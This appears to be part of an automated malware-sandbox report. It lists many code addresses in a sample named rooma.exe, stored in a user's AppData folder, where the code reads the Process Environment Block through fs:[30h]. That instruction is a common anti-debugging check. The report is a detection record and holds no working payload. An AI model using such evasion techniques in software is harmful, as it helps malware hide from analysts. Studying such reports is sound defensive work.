Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h] 7_2_0158E388
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B438F mov eax, dword ptr fs:[00000030h] 7_2_015B438F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B438F mov eax, dword ptr fs:[00000030h] 7_2_015B438F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166539D mov eax, dword ptr fs:[00000030h] 7_2_0166539D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C33A0 mov eax, dword ptr fs:[00000030h] 7_2_015C33A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C33A0 mov eax, dword ptr fs:[00000030h] 7_2_015C33A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B33A5 mov eax, dword ptr fs:[00000030h] 7_2_015B33A5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01596259 mov eax, dword ptr fs:[00000030h] 7_2_01596259
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A250 mov eax, dword ptr fs:[00000030h] 7_2_0158A250
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165D26B mov eax, dword ptr fs:[00000030h] 7_2_0165D26B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165D26B mov eax, dword ptr fs:[00000030h] 7_2_0165D26B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C724D mov eax, dword ptr fs:[00000030h] 7_2_015C724D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589240 mov eax, dword ptr fs:[00000030h] 7_2_01589240
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589240 mov eax, dword ptr fs:[00000030h] 7_2_01589240
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D1270 mov eax, dword ptr fs:[00000030h] 7_2_015D1270
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D1270 mov eax, dword ptr fs:[00000030h] 7_2_015D1270
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B9274 mov eax, dword ptr fs:[00000030h] 7_2_015B9274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B256 mov eax, dword ptr fs:[00000030h] 7_2_0164B256
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B256 mov eax, dword ptr fs:[00000030h] 7_2_0164B256
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158826B mov eax, dword ptr fs:[00000030h] 7_2_0158826B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01594260 mov eax, dword ptr fs:[00000030h] 7_2_01594260
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01594260 mov eax, dword ptr fs:[00000030h] 7_2_01594260
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01594260 mov eax, dword ptr fs:[00000030h] 7_2_01594260
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665227 mov eax, dword ptr fs:[00000030h] 7_2_01665227
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7208 mov eax, dword ptr fs:[00000030h] 7_2_015C7208
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7208 mov eax, dword ptr fs:[00000030h] 7_2_015C7208
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158823B mov eax, dword ptr fs:[00000030h] 7_2_0158823B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016652E2 mov eax, dword ptr fs:[00000030h] 7_2_016652E2
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF2D0 mov eax, dword ptr fs:[00000030h] 7_2_015BF2D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF2D0 mov eax, dword ptr fs:[00000030h] 7_2_015BF2D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h] 7_2_0158B2D3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h] 7_2_0158B2D3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h] 7_2_0158B2D3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015992C5 mov eax, dword ptr fs:[00000030h] 7_2_015992C5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015992C5 mov eax, dword ptr fs:[00000030h] 7_2_015992C5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F2F8 mov eax, dword ptr fs:[00000030h] 7_2_0164F2F8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015892FF mov eax, dword ptr fs:[00000030h] 7_2_015892FF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A02E1 mov eax, dword ptr fs:[00000030h] 7_2_015A02E1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A02E1 mov eax, dword ptr fs:[00000030h] 7_2_015A02E1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A02E1 mov eax, dword ptr fs:[00000030h] 7_2_015A02E1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C329E mov eax, dword ptr fs:[00000030h] 7_2_015C329E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C329E mov eax, dword ptr fs:[00000030h] 7_2_015C329E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016272A0 mov eax, dword ptr fs:[00000030h] 7_2_016272A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016272A0 mov eax, dword ptr fs:[00000030h] 7_2_016272A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov ecx, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h] 7_2_016592A6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h] 7_2_016592A6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h] 7_2_016592A6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h] 7_2_016592A6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE284 mov eax, dword ptr fs:[00000030h] 7_2_015CE284
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE284 mov eax, dword ptr fs:[00000030h] 7_2_015CE284
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016192BC mov eax, dword ptr fs:[00000030h] 7_2_016192BC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016192BC mov eax, dword ptr fs:[00000030h] 7_2_016192BC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016192BC mov ecx, dword ptr fs:[00000030h] 7_2_016192BC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016192BC mov ecx, dword ptr fs:[00000030h] 7_2_016192BC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01610283 mov eax, dword ptr fs:[00000030h] 7_2_01610283
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01610283 mov eax, dword ptr fs:[00000030h] 7_2_01610283
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01610283 mov eax, dword ptr fs:[00000030h] 7_2_01610283
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665283 mov eax, dword ptr fs:[00000030h] 7_2_01665283
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A02A0 mov eax, dword ptr fs:[00000030h] 7_2_015A02A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A02A0 mov eax, dword ptr fs:[00000030h] 7_2_015A02A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h] 7_2_015A52A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h] 7_2_015A52A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h] 7_2_015A52A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h] 7_2_015A52A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01598550 mov eax, dword ptr fs:[00000030h] 7_2_01598550
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01598550 mov eax, dword ptr fs:[00000030h] 7_2_01598550
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CB570 mov eax, dword ptr fs:[00000030h] 7_2_015CB570
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CB570 mov eax, dword ptr fs:[00000030h] 7_2_015CB570
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C656A mov eax, dword ptr fs:[00000030h] 7_2_015C656A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C656A mov eax, dword ptr fs:[00000030h] 7_2_015C656A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C656A mov eax, dword ptr fs:[00000030h] 7_2_015C656A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B562 mov eax, dword ptr fs:[00000030h] 7_2_0158B562
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B52F mov eax, dword ptr fs:[00000030h] 7_2_0164B52F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665537 mov eax, dword ptr fs:[00000030h] 7_2_01665537
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7505 mov eax, dword ptr fs:[00000030h] 7_2_015C7505
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7505 mov ecx, dword ptr fs:[00000030h] 7_2_015C7505
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h] 7_2_015BE53E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h] 7_2_015BE53E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h] 7_2_015BE53E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h] 7_2_015BE53E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h] 7_2_015BE53E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CD530 mov eax, dword ptr fs:[00000030h] 7_2_015CD530
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CD530 mov eax, dword ptr fs:[00000030h] 7_2_015CD530
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h] 7_2_0159D534
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h] 7_2_0159D534
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h] 7_2_0159D534
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h] 7_2_0159D534
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h] 7_2_0159D534
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h] 7_2_0159D534
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h] 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h] 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h] 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h] 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h] 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h] 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B95DA mov eax, dword ptr fs:[00000030h] 7_2_015B95DA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015965D0 mov eax, dword ptr fs:[00000030h] 7_2_015965D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA5D0 mov eax, dword ptr fs:[00000030h] 7_2_015CA5D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA5D0 mov eax, dword ptr fs:[00000030h] 7_2_015CA5D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE5CF mov eax, dword ptr fs:[00000030h] 7_2_015CE5CF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE5CF mov eax, dword ptr fs:[00000030h] 7_2_015CE5CF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C55C0 mov eax, dword ptr fs:[00000030h] 7_2_015C55C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h] 7_2_015B15F4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h] 7_2_015B15F4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h] 7_2_015B15F4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h] 7_2_015B15F4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h] 7_2_015B15F4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h] 7_2_015B15F4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016655C9 mov eax, dword ptr fs:[00000030h] 7_2_016655C9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D5D0 mov eax, dword ptr fs:[00000030h] 7_2_0160D5D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D5D0 mov ecx, dword ptr fs:[00000030h] 7_2_0160D5D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016635D7 mov eax, dword ptr fs:[00000030h] 7_2_016635D7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016635D7 mov eax, dword ptr fs:[00000030h] 7_2_016635D7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016635D7 mov eax, dword ptr fs:[00000030h] 7_2_016635D7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CC5ED mov eax, dword ptr fs:[00000030h] 7_2_015CC5ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CC5ED mov eax, dword ptr fs:[00000030h] 7_2_015CC5ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015925E0 mov eax, dword ptr fs:[00000030h] 7_2_015925E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE59C mov eax, dword ptr fs:[00000030h] 7_2_015CE59C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016105A7 mov eax, dword ptr fs:[00000030h] 7_2_016105A7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016105A7 mov eax, dword ptr fs:[00000030h] 7_2_016105A7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016105A7 mov eax, dword ptr fs:[00000030h] 7_2_016105A7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C4588 mov eax, dword ptr fs:[00000030h] 7_2_015C4588
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158758F mov eax, dword ptr fs:[00000030h] 7_2_0158758F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158758F mov eax, dword ptr fs:[00000030h] 7_2_0158758F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158758F mov eax, dword ptr fs:[00000030h] 7_2_0158758F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016235BA mov eax, dword ptr fs:[00000030h] 7_2_016235BA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016235BA mov eax, dword ptr fs:[00000030h] 7_2_016235BA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016235BA mov eax, dword ptr fs:[00000030h] 7_2_016235BA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016235BA mov eax, dword ptr fs:[00000030h] 7_2_016235BA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F5BE mov eax, dword ptr fs:[00000030h] 7_2_0164F5BE
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592582 mov eax, dword ptr fs:[00000030h] 7_2_01592582
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592582 mov ecx, dword ptr fs:[00000030h] 7_2_01592582
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B45B1 mov eax, dword ptr fs:[00000030h] 7_2_015B45B1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B45B1 mov eax, dword ptr fs:[00000030h] 7_2_015B45B1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h] 7_2_015B15A9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h] 7_2_015B15A9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h] 7_2_015B15A9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h] 7_2_015B15A9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h] 7_2_015B15A9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161B594 mov eax, dword ptr fs:[00000030h] 7_2_0161B594
